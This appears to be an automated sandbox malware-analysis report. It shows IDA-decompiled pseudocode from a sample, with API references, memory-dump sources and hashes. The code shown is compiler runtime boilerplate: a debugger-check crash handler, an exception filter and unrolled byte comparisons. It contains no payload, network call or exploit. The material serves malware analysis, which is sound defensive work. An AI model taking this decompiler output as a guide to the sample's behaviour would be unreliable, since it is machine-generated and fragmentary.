                  				_t17 = UnhandledExceptionFilter(0x40308c);
                  				if( *0x589878 == 0) {
                  					_push(1);
                  					E0040F12C(_t17);
                  				}
                  				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                  			}



















                  0x0040a40b
                  0x0040a40b
                  0x0040a40b
                  0x0040a40b
                  0x0040a40b
                  0x0040a40b
                  0x0040a40b
                  0x0040a411
                  0x0040a413
                  0x0040a413
                  0x00412401
                  0x00412406
                  0x0041240c
                  0x00412412
                  0x00412418
                  0x0041241e
                  0x00412424
                  0x0041242b
                  0x00412432
                  0x00412439
                  0x00412440
                  0x00412447
                  0x0041244e
                  0x0041244f
                  0x00412458
                  0x00412460
                  0x00412468
                  0x00412473
                  0x0041247d
                  0x00412482
                  0x00412487
                  0x00412491
                  0x0041249b
                  0x004124a0
                  0x004124a6
                  0x004124ab
                  0x004124b7
                  0x004124bc
                  0x004124be
                  0x004124c6
                  0x004124d1
                  0x004124de
                  0x004124e0
                  0x004124e2
                  0x004124e7
                  0x004124fb

                  APIs
                  • IsDebuggerPresent.KERNEL32 ref: 004124B1
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004124C6
                  • UnhandledExceptionFilter.KERNEL32(0040308C), ref: 004124D1
                  • GetCurrentProcess.KERNEL32(C0000409), ref: 004124ED
                  • TerminateProcess.KERNEL32(00000000), ref: 004124F4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                  • String ID: AOvB
                  • API String ID: 2579439406-2560480373
                  • Opcode ID: c20cde4acfc1a8236cf1851dcd65546ea404a70e0027afc166295048e70544e4
                  • Instruction ID: 11e3e79694981a4de1d1310e8fcb621b5c759f100c898a8fc7de98499938c7fc
                  • Opcode Fuzzy Hash: c20cde4acfc1a8236cf1851dcd65546ea404a70e0027afc166295048e70544e4
                  • Instruction Fuzzy Hash: 6221D2B4402304DFD700EFA5ED846A47BA0FB68710F18606EED09B7270E7B85988EF59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E0041A8B0(void* __ebx, void* __ecx, void* __edi) {
                  				void* _t180;
                  				void* _t183;
                  				void* _t236;
                  
                  				_t236 = __edi;
                  				_t183 = __ecx;
                  				_t180 = __ebx;
                  				_push(cs);
                  			}






                  0x0041a8b0
                  0x0041a8b0
                  0x0041a8b0
                  0x0041a8b0

                  APIs
                  • RaiseException.KERNEL32(C0000091,00000000,?,?), ref: 0041AA8A
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: ExceptionRaise
                  • String ID:
                  • API String ID: 3997070919-0
                  • Opcode ID: 407b6bbc0f667df8dc7e27d1f5d60638db660ff6d8a2ac7087232e9ba0987fcd
                  • Instruction ID: d220673a5284e44978b7f96faf08b508a2b5f04cf6ea549abfb65174e7550c7e
                  • Opcode Fuzzy Hash: 407b6bbc0f667df8dc7e27d1f5d60638db660ff6d8a2ac7087232e9ba0987fcd
                  • Instruction Fuzzy Hash: 4FA19E71211609CFD718CF18C496AA57BA0FF04364F15869EE9DA8F2E1C738E9E1CB49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00410E4E() {
                  
                  				SetUnhandledExceptionFilter(E00410E0C);
                  				return 0;
                  			}



                  0x00410e53
                  0x00410e5b

                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_00010E0C), ref: 00410E53
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: 8b260c72ec6c02a8a187b7d61e67914e09fad261100421c17a6ce5d7bb74eddd
                  • Instruction ID: ed232c427aac2de295471c2012691e7ebc086be7e9e5e5b1d1bd3058733b860b
                  • Opcode Fuzzy Hash: 8b260c72ec6c02a8a187b7d61e67914e09fad261100421c17a6ce5d7bb74eddd
                  • Instruction Fuzzy Hash: 139002743513044786041B715E0978526905A5CB127550861A101D8868EBA440905559
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00414A7C(void* __eax, void* __ecx) {
                  				void* _t196;
                  				signed int _t197;
                  				void* _t200;
                  				signed char _t206;
                  				signed char _t207;
                  				signed char _t208;
                  				signed char _t210;
                  				signed char _t211;
                  				signed int _t216;
                  				signed int _t316;
                  				void* _t319;
                  				void* _t321;
                  				void* _t323;
                  				void* _t325;
                  				void* _t327;
                  				void* _t330;
                  				void* _t332;
                  				void* _t334;
                  				void* _t337;
                  				void* _t339;
                  				void* _t341;
                  				void* _t344;
                  				void* _t346;
                  				void* _t348;
                  				void* _t351;
                  				void* _t353;
                  				void* _t355;
                  				void* _t358;
                  				void* _t360;
                  				void* _t362;
                  
                  				_t200 = __ecx;
                  				_t196 = __eax;
                  				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
                  					_t316 = 0;
                  					L17:
                  					if(_t316 != 0) {
                  						goto L1;
                  					}
                  					_t206 =  *(_t196 - 0x1b);
                  					if(_t206 ==  *(_t200 - 0x1b)) {
                  						_t316 = 0;
                  						L28:
                  						if(_t316 != 0) {
                  							goto L1;
                  						}
                  						_t207 =  *(_t196 - 0x17);
                  						if(_t207 ==  *(_t200 - 0x17)) {
                  							_t316 = 0;
                  							L39:
                  							if(_t316 != 0) {
                  								goto L1;
                  							}
                  							_t208 =  *(_t196 - 0x13);
                  							if(_t208 ==  *(_t200 - 0x13)) {
                  								_t316 = 0;
                  								L50:
                  								if(_t316 != 0) {
                  									goto L1;
                  								}
                  								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
                  									_t316 = 0;
                  									L61:
                  									if(_t316 != 0) {
                  										goto L1;
                  									}
                  									_t210 =  *(_t196 - 0xb);
                  									if(_t210 ==  *(_t200 - 0xb)) {
                  										_t316 = 0;
                  										L72:
                  										if(_t316 != 0) {
                  											goto L1;
                  										}
                  										_t211 =  *(_t196 - 7);
                  										if(_t211 ==  *(_t200 - 7)) {
                  											_t316 = 0;
                  											L83:
                  											if(_t316 != 0) {
                  												goto L1;
                  											}
                  											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
                  											if(_t319 == 0) {
                  												L5:
                  												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
                  												if(_t321 == 0) {
                  													L3:
                  													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
                  													if(_t197 != 0) {
                  														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
                  													}
                  													L2:
                  													return _t197;
                  												}
                  												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                  												if(_t216 != 0) {
                  													L86:
                  													_t197 = _t216;
                  													goto L2;
                  												} else {
                  													goto L3;
                  												}
                  											}
                  											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
                  											if(_t216 == 0) {
                  												goto L5;
                  											}
                  											goto L86;
                  										}
                  										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
                  										if(_t323 == 0) {
                  											L76:
                  											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
                  											if(_t325 == 0) {
                  												L78:
                  												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
                  												if(_t327 == 0) {
                  													L80:
                  													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
                  													if(_t316 != 0) {
                  														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  													}
                  													goto L83;
                  												}
                  												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                  												if(_t316 != 0) {
                  													goto L1;
                  												}
                  												goto L80;
                  											}
                  											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                  											if(_t316 != 0) {
                  												goto L1;
                  											}
                  											goto L78;
                  										}
                  										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                  										if(_t316 != 0) {
                  											goto L1;
                  										}
                  										goto L76;
                  									}
                  									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
                  									if(_t330 == 0) {
                  										L65:
                  										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
                  										if(_t332 == 0) {
                  											L67:
                  											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
                  											if(_t334 == 0) {
                  												L69:
                  												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
                  												if(_t316 != 0) {
                  													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  												}
                  												goto L72;
                  											}
                  											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                  											if(_t316 != 0) {
                  												goto L1;
                  											}
                  											goto L69;
                  										}
                  										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                  										if(_t316 != 0) {
                  											goto L1;
                  										}
                  										goto L67;
                  									}
                  									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                  									if(_t316 != 0) {
                  										goto L1;
                  									}
                  									goto L65;
                  								}
                  								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
                  								if(_t337 == 0) {
                  									L54:
                  									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
                  									if(_t339 == 0) {
                  										L56:
                  										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
                  										if(_t341 == 0) {
                  											L58:
                  											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
                  											if(_t316 != 0) {
                  												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  											}
                  											goto L61;
                  										}
                  										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
                  										if(_t316 != 0) {
                  											goto L1;
                  										}
                  										goto L58;
                  									}
                  									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                  									if(_t316 != 0) {
                  										goto L1;
                  									}
                  									goto L56;
                  								}
                  								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                  								if(_t316 != 0) {
                  									goto L1;
                  								}
                  								goto L54;
                  							}
                  							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
                  							if(_t344 == 0) {
                  								L43:
                  								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
                  								if(_t346 == 0) {
                  									L45:
                  									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
                  									if(_t348 == 0) {
                  										L47:
                  										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
                  										if(_t316 != 0) {
                  											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  										}
                  										goto L50;
                  									}
                  									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
                  									if(_t316 != 0) {
                  										goto L1;
                  									}
                  									goto L47;
                  								}
                  								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                  								if(_t316 != 0) {
                  									goto L1;
                  								}
                  								goto L45;
                  							}
                  							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                  							if(_t316 != 0) {
                  								goto L1;
                  							}
                  							goto L43;
                  						}
                  						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
                  						if(_t351 == 0) {
                  							L32:
                  							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
                  							if(_t353 == 0) {
                  								L34:
                  								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
                  								if(_t355 == 0) {
                  									L36:
                  									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
                  									if(_t316 != 0) {
                  										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  									}
                  									goto L39;
                  								}
                  								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
                  								if(_t316 != 0) {
                  									goto L1;
                  								}
                  								goto L36;
                  							}
                  							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                  							if(_t316 != 0) {
                  								goto L1;
                  							}
                  							goto L34;
                  						}
                  						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                  						if(_t316 != 0) {
                  							goto L1;
                  						}
                  						goto L32;
                  					}
                  					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
                  					if(_t358 == 0) {
                  						L21:
                  						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
                  						if(_t360 == 0) {
                  							L23:
                  							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
                  							if(_t362 == 0) {
                  								L25:
                  								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
                  								if(_t316 != 0) {
                  									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                  								}
                  								goto L28;
                  							}
                  							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
                  							if(_t316 != 0) {
                  								goto L1;
                  							}
                  							goto L25;
                  						}
                  						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
                  						if(_t316 != 0) {
                  							goto L1;
                  						}
                  						goto L23;
                  					}
                  					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
                  					if(_t316 != 0) {
                  						goto L1;
                  					}
                  					goto L21;
                  				} else {
                  					__edx =  *(__ecx - 0x1f) & 0x000000ff;
                  					__esi =  *(__eax - 0x1f) & 0x000000ff;
                  					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
                  					if(__esi == 0) {
                  						L10:
                  						__esi =  *(__eax - 0x1e) & 0x000000ff;
                  						__edx =  *(__ecx - 0x1e) & 0x000000ff;
                  						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                  						if(__esi == 0) {
                  							L12:
                  							__esi =  *(__eax - 0x1d) & 0x000000ff;
                  							__edx =  *(__ecx - 0x1d) & 0x000000ff;
                  							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                  							if(__esi == 0) {
                  								L14:
                  								__esi =  *(__eax - 0x1c) & 0x000000ff;
                  								__edx =  *(__ecx - 0x1c) & 0x000000ff;
                  								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                  								if(__esi != 0) {
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = (__esi > 0) + (__esi > 0) - 1;
                  								}
                  								goto L17;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L1;
                  							}
                  							goto L14;
                  						}
                  						0 = 0 | __esi > 0x00000000;
                  						__edx = (__esi > 0) + (__esi > 0) - 1;
                  						__esi = __edx;
                  						if(__edx != 0) {
                  							goto L1;
                  						}
                  						goto L12;
                  					}
                  					0 = 0 | __esi > 0x00000000;
                  					__edx = (__esi > 0) + (__esi > 0) - 1;
                  					__esi = __edx;
                  					if(__edx != 0) {
                  						goto L1;
                  					}
                  					goto L10;
                  				}
                  				L1:
                  				_t197 = _t316;
                  				goto L2;
                  			}

































                  0x00414a7c
                  0x00414a7c
                  0x00414a82
                  0x00414b02
                  0x00414b04
                  0x00414b06
                  0x00000000
                  0x00000000
                  0x00414b0c
                  0x00414b12
                  0x00414b91
                  0x00414b93
                  0x00414b95
                  0x00000000
                  0x00000000
                  0x00414b9b
                  0x00414ba1
                  0x00414c20
                  0x00414c22
                  0x00414c24
                  0x00000000
                  0x00000000
                  0x00414c2a
                  0x00414c30
                  0x00414caf
                  0x00414cb1
                  0x00414cb3
                  0x00000000
                  0x00000000
                  0x00414cbf
                  0x00414d3f
                  0x00414d41
                  0x00414d43
                  0x00000000
                  0x00000000
                  0x00414d49
                  0x00414d4f
                  0x00414dce
                  0x00414dd0
                  0x00414dd2
                  0x00000000
                  0x00000000
                  0x00414dd8
                  0x00414dde
                  0x00414e5d
                  0x00414e5f
                  0x00414e61
                  0x00000000
                  0x00000000
                  0x00414e6f
                  0x00414e71
                  0x00414a54
                  0x00414a5c
                  0x00414a5e
                  0x0041463a
                  0x00414642
                  0x00414644
                  0x00414655
                  0x00414655
                  0x0041424a
                  0x00414fa6
                  0x00414fa6
                  0x00414a6b
                  0x00414a71
                  0x00414e8a
                  0x00414e8a
                  0x00000000
                  0x00414a77
                  0x00000000
                  0x00414a77
                  0x00414a71
                  0x00414e7e
                  0x00414e84
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414e84
                  0x00414de7
                  0x00414de9
                  0x00414e00
                  0x00414e08
                  0x00414e0a
                  0x00414e21
                  0x00414e29
                  0x00414e2b
                  0x00414e42
                  0x00414e4a
                  0x00414e4c
                  0x00414e59
                  0x00414e59
                  0x00000000
                  0x00414e4c
                  0x00414e38
                  0x00414e3c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414e3c
                  0x00414e17
                  0x00414e1b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414e1b
                  0x00414df6
                  0x00414dfa
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414dfa
                  0x00414d58
                  0x00414d5a
                  0x00414d71
                  0x00414d79
                  0x00414d7b
                  0x00414d92
                  0x00414d9a
                  0x00414d9c
                  0x00414db3
                  0x00414dbb
                  0x00414dbd
                  0x00414dca
                  0x00414dca
                  0x00000000
                  0x00414dbd
                  0x00414da9
                  0x00414dad
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414dad
                  0x00414d88
                  0x00414d8c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414d8c
                  0x00414d67
                  0x00414d6b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414d6b
                  0x00414cc9
                  0x00414ccb
                  0x00414ce2
                  0x00414cea
                  0x00414cec
                  0x00414d03
                  0x00414d0b
                  0x00414d0d
                  0x00414d24
                  0x00414d2c
                  0x00414d2e
                  0x00414d3b
                  0x00414d3b
                  0x00000000
                  0x00414d2e
                  0x00414d1a
                  0x00414d1e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414d1e
                  0x00414cf9
                  0x00414cfd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414cfd
                  0x00414cd8
                  0x00414cdc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414cdc
                  0x00414c39
                  0x00414c3b
                  0x00414c52
                  0x00414c5a
                  0x00414c5c
                  0x00414c73
                  0x00414c7b
                  0x00414c7d
                  0x00414c94
                  0x00414c9c
                  0x00414c9e
                  0x00414cab
                  0x00414cab
                  0x00000000
                  0x00414c9e
                  0x00414c8a
                  0x00414c8e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414c8e
                  0x00414c69
                  0x00414c6d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414c6d
                  0x00414c48
                  0x00414c4c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414c4c
                  0x00414baa
                  0x00414bac
                  0x00414bc3
                  0x00414bcb
                  0x00414bcd
                  0x00414be4
                  0x00414bec
                  0x00414bee
                  0x00414c05
                  0x00414c0d
                  0x00414c0f
                  0x00414c1c
                  0x00414c1c
                  0x00000000
                  0x00414c0f
                  0x00414bfb
                  0x00414bff
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414bff
                  0x00414bda
                  0x00414bde
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414bde
                  0x00414bb9
                  0x00414bbd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414bbd
                  0x00414b1b
                  0x00414b1d
                  0x00414b34
                  0x00414b3c
                  0x00414b3e
                  0x00414b55
                  0x00414b5d
                  0x00414b5f
                  0x00414b76
                  0x00414b7e
                  0x00414b80
                  0x00414b8d
                  0x00414b8d
                  0x00000000
                  0x00414b80
                  0x00414b6c
                  0x00414b70
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414b70
                  0x00414b4b
                  0x00414b4f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414b4f
                  0x00414b2a
                  0x00414b2e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414a84
                  0x00414a84
                  0x00414a88
                  0x00414a8c
                  0x00414a8e
                  0x00414aa5
                  0x00414aa5
                  0x00414aa9
                  0x00414aad
                  0x00414aaf
                  0x00414ac6
                  0x00414ac6
                  0x00414aca
                  0x00414ace
                  0x00414ad0
                  0x00414ae7
                  0x00414ae7
                  0x00414aeb
                  0x00414aef
                  0x00414af1
                  0x00414af7
                  0x00414afa
                  0x00414afe
                  0x00414afe
                  0x00000000
                  0x00414af1
                  0x00414ad6
                  0x00414ad9
                  0x00414add
                  0x00414ae1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414ae1
                  0x00414ab5
                  0x00414ab8
                  0x00414abc
                  0x00414ac0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414ac0
                  0x00414a94
                  0x00414a97
                  0x00414a9b
                  0x00414a9f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00414a9f
                  0x00413e75
                  0x00413e75
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                  • Instruction ID: 25e239e0fb30427d8d87402450343b4e7aae652c58a160f02a4417542b073acd
                  • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                  • Instruction Fuzzy Hash: 9FD18F73C0AAB34A8735852D40686BBEE626FD178131FC3E2DCD43F389D62A9D8095D4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0041465C(void* __eax, void* __ecx) {
                  				void* _t191;
                  				signed int _t192;
                  				void* _t195;
                  				signed char _t201;
                  				signed char _t202;
                  				signed char _t203;
                  				signed char _t204;
                  				signed char _t206;
                  				signed int _t211;
                  				signed int _t309;
                  				void* _t312;
                  				void* _t314;
                  				void* _t316;
                  				void* _t318;
                  				void* _t321;
                  				void* _t323;
                  				void* _t325;
                  				void* _t328;
                  				void* _t330;
                  				void* _t332;
                  				void* _t335;
                  				void* _t337;
                  				void* _t339;
                  				void* _t342;
                  				void* _t344;
                  				void* _t346;
                  				void* _t349;
                  				void* _t351;
                  				void* _t353;
                  
                  				_t195 = __ecx;
                  				_t191 = __eax;
                  				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
                  					_t309 = 0;
                  					L15:
                  					if(_t309 != 0) {
                  						goto L1;
                  					}
                  					_t201 =  *(_t191 - 0x1a);
                  					if(_t201 ==  *(_t195 - 0x1a)) {
                  						_t309 = 0;
                  						L26:
                  						if(_t309 != 0) {
                  							goto L1;
                  						}
                  						_t202 =  *(_t191 - 0x16);
                  						if(_t202 ==  *(_t195 - 0x16)) {
                  							_t309 = 0;
                  							L37:
                  							if(_t309 != 0) {
                  								goto L1;
                  							}
                  							_t203 =  *(_t191 - 0x12);
                  							if(_t203 ==  *(_t195 - 0x12)) {
                  								_t309 = 0;
                  								L48:
                  								if(_t309 != 0) {
                  									goto L1;
                  								}
                  								_t204 =  *(_t191 - 0xe);
                  								if(_t204 ==  *(_t195 - 0xe)) {
                  									_t309 = 0;
                  									L59:
                  									if(_t309 != 0) {
                  										goto L1;
                  									}
                  									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
                  										_t309 = 0;
                  										L70:
                  										if(_t309 != 0) {
                  											goto L1;
                  										}
                  										_t206 =  *(_t191 - 6);
                  										if(_t206 ==  *(_t195 - 6)) {
                  											_t309 = 0;
                  											L81:
                  											if(_t309 != 0) {
                  												goto L1;
                  											}
                  											if( *(_t191 - 2) ==  *(_t195 - 2)) {
                  												_t192 = 0;
                  												L3:
                  												return _t192;
                  											}
                  											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
                  											if(_t312 == 0) {
                  												L4:
                  												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
                  												if(_t192 != 0) {
                  													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
                  												}
                  												goto L3;
                  											}
                  											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
                  											if(_t211 != 0) {
                  												_t192 = _t211;
                  												goto L3;
                  											}
                  											goto L4;
                  										}
                  										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
                  										if(_t314 == 0) {
                  											L74:
                  											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
                  											if(_t316 == 0) {
                  												L76:
                  												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
                  												if(_t318 == 0) {
                  													L78:
                  													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
